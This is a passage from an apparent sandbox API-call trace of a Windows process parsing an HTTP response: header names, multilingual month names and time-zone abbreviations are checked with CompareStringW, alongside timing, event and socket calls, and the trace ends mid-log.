lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0103.173] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0103.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.175] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.176] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0103.177] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0103.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.179] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0103.179] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f4 [0103.179] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f0 [0103.179] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x264)) [0103.179] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0103.179] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x264)) [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] ResetEvent (hEvent=0x3f4) returned 1 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] GetCurrentThreadId () returned 0x1358 [0103.179] ResetEvent (hEvent=0x3f4) returned 1 [0103.180] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x264)) [0103.180] GetCurrentThreadId () returned 0x1358 [0103.180] GetCurrentThreadId () returned 0x1358 [0103.180] SetEvent (hEvent=0x3f0) returned 1 [0103.180] SetEvent (hEvent=0x3f4) returned 1 [0103.180] GetCurrentThreadId () returned 0x1358 [0103.180] GetCurrentThreadId () returned 0x1358 [0103.180] GetCurrentThreadId () returned 0x1358 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="HEAD", cchCount2=4) returned 1 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="HEAD", cchCount2=4) returned 1 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html", cchCount2=9) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="text/html-sandboxed", cchCount2=19) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xhtml+xml", cchCount2=21) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml", cchCount2=15) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-external-parsed-entity", cchCount2=38) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=10, lpString2="application/xml-dtd", cchCount2=19) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="text/plain", cchCount1=5, lpString2="text/", cchCount2=5) returned 2 [0103.180] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0103.180] GetTickCount64 () returned 0x115b17a [0103.180] GetTickCount64 () returned 0x115b17a [0103.180] GetTickCount64 () returned 0x115b17a [0103.180] GetTickCount64 () returned 0x115b17a [0103.180] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.180] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0103.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0103.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0103.181] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=7, lpWideCharStr=0x247a9cc, cchWideChar=7 | out: lpWideCharStr="Germany") returned 7 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] GetCurrentThreadId () returned 0x1358 [0103.181] 